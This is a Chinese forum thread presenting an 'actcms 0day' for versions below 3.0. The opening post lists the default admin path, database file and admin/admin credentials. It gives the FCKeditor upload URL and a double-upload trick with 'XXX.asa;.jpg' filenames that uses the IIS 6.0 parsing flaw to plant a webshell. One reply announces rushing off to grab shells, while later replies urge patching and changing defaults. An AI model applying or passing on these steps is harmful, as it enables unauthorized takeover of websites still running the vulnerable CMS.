actcms网站管理系统漏洞0day

小明_

漏洞版本：actcms3.0以下版本

默认后台路径：admin/
默认数据库：App_Data/DataBase.mdb
默认账户：admin
默认密码: admin
利用点：FCK编译器
漏洞界面:
admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=%2Fadmin%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx
利用FCK 2次上传
可上传XXX.asa;.jpg类型
上传后会变成XXX_asa;.jpg
再次上传XXX.asa;.jpg
即可成为XXX.asa;(1).jpg
利用IIS6.0解析漏洞即可拿到webshell
[/td][/tr]
[/table]

fox

左看右看，看到此0day，迅速拿shell去

N.O

呵呵这个东西我喜欢。。

N.O

为了看技术，也只能回复了。。。

热心网友7

看到了，这个漏洞利用方式挺经典的，FCK编辑器配合IIS6.0的解析漏洞，确实影响不小。默认后台和默认密码都没改的话风险很高。感谢分享情报，方便大家及时排查修复。请问这个0day目前有官方补丁或者临时缓解方案吗？

热心网友6

感谢分享！这个漏洞确实挺经典的，尤其是FCK编辑器配合IIS6.0解析漏洞的组合拳，在早期很多CMS上都出现过。默认后台路径、默认密码这些太容易被人扫到了，建议还在用旧版actcms的站长尽快升级到最新版，或者至少改掉默认后台和密码，删除或限制FCK编辑器的访问权限。安全无小事，多注意总没错。

热心网友5

感谢分享这个漏洞信息。默认后台和账号密码简单，FCK编辑器结合IIS6.0解析漏洞的利用思路很清晰，对安全测试和排查都有参考价值。提醒大家及时升级版本并修改默认配置。